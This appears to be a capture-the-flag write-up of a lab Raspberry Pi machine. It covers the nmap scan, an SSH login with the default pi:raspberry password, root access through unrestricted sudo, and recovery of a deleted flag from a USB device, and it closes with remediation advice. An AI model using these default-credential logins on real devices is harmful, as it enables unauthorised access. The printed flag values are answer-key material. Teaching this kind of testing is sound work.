Mirai identifies vulnerable IoT devices using a table of more than 60 common factory default usernames and passwords and logs into them to infect them with the Mirai malware
Vulnerability Explanation: It is possible to access the machine using ssh using the default credential of the raspberry pi. Raspberry Pi OS through 5.10 has the raspberry default password for the pi account. If not changed, attackers can gain administrator privileges.
Vulnerability Fix: Always change the default password of the user and the root with any new installation.
Privilege Escalation Vulnerability: No need for Priv Esc
Vulnerability Fix: The developer should have conformed to the principle of least privilege and the concept of separation of privileges.
Severity: Critical
An initial nmap scan revealed the lighttpd 1.4.35 running on port 80 and ssh on port 22.
# Nmap 7.92 scan initiated Mon Jan 24 05:37:52 2022 as: nmap -sC -sV -v -oN nmap/initial 10.10.10.48
Nmap scan report for 10.10.10.48
Host is up (0.13s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
| 1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
| 2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
| 256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
|_ 256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
53/tcp open domain dnsmasq 2.76
| dns-nsid:
|_ bind.version: dnsmasq-2.76
80/tcp open http lighttpd 1.4.35
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: lighttpd/1.4.35
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jan 24 05:38:16 2022 -- 1 IP address (1 host up) scanned in 23.34 seconds
Using the default of raspberry pi, the default password and username of ssh are pi:raspberry
pi@raspberrypi:~/Desktop $ cat user.txt && hostname && whoami && ip a
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
raspberrypi
pi
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
link/ether 00:50:56:b9:e6:10 brd ff:ff:ff:ff:ff:ff
inet 10.10.10.48/24 brd 10.10.10.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::250:56ff:feb9:e610/64 scope link
valid_lft forever preferred_lft forever
inet6 fe80::74dd:973a:91e9:2497/64 scope link
valid_lft forever preferred_lft forever
Privilege Escalation
Checking the permissions the pi user had:
pi@raspberrypi:~/Desktop $ sudo -l
Matching Defaults entries for pi on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User pi may run the following commands on localhost:
(ALL : ALL) ALL
(ALL) NOPASSWD: ALL
Run $ sudo su and get the root privilege
pi@raspberrypi:~/Desktop $ sudo su
root@raspberrypi:/home/pi/Desktop# whoami && id
root
uid=0(root) gid=0(root) groups=0(root)
root@raspberrypi:/home/pi/Desktop#
Showing the content of root.txt gives that the root flag is on the USB Stick.
To check the attached devised to the system as well as its mount points, you can run the df command as the following:
The USB strick is on /dev/sdb and mounted on /media/usbstick
The file was deleted, we need to get them back:
Using $ cat sdb file on /dev/ directory we can see the previous content of the USB stick:
root.txt
root@raspberrypi:/dev# strings sdb | grep -i 3d3e483143ff12ec505d026fa13e020b && hostname && whoami && ip a
3d3e483143ff12ec505d026fa13e020b
raspberrypi
root
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
link/ether 00:50:56:b9:e6:10 brd ff:ff:ff:ff:ff:ff
inet 10.10.10.48/24 brd 10.10.10.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::250:56ff:feb9:e610/64 scope link
valid_lft forever preferred_lft forever
inet6 fe80::74dd:973a:91e9:2497/64 scope link
valid_lft forever preferred_lft forever
Lessons Learned
To gain an initial foothold on the box we exploited two vulnerabilities.
Use of default credentials. The user used the default password that is shipped with the application. Since default credentials are publicly available and can be easily obtained, the user should have instead used a sufficiently long password that is difficult to crack.
Always separate the privileges from the normal user and the administrators’ users.
